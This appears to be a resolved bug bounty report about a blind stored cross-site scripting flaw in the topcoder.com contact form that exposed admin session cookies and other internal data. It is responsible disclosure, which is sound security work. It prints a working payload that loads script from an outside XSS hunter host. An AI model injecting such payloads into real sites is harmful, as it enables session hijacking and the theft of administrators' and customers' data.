Loading HuntDB...

Blind stored XSS due to insecure contact form at https://www.topcoder.com leads to leakage of session token and other PII

High
L
Lab45
Submitted None
Reported by mase289

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Stored
## Summary: I have discovered a blind stored cross site scripting vulnerability due to an insecure Contact form available here https://www.topcoder.com/contact-us/ This form does not properly sanitize user input allowing for the insertion and submission of dangerous characters such as angle brackets. I was able to submit a blind xss payload through the form which was triggered in backend /admin panel. ## Steps To Reproduce: [add details for how we can reproduce the issue] 1. Browse to the page at https://www.topcoder.com/contact-us/ and fill out the contact form submitting your blind XSS payload in First name , Last name, Company and description field. 2. Submit the form and have and admin access the information. 3. This will trigger XSS in the admin panel and a notification to the XSS hunter service with details of the event. ## Supporting Material/References: [list any additional material (e.g. screenshots, logs, etc.)] * [attachment / reference] F834746 XSS hunter screenshot revealing mail chimp information █████ Dom.html you can search through this for my XSS hunter payload `"><script src=https://xvt.xss.ht></script>` F834748 Full XSS hunter email report ## Impact An attacker is able to access critical information from the admin panel. The XSS reveals the administrator’s IP address, backend application service, titles of mail chimp customer and internal subscription emails, admin session cookies. An attacker can exploit the above cookies to access the admin panel.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Stored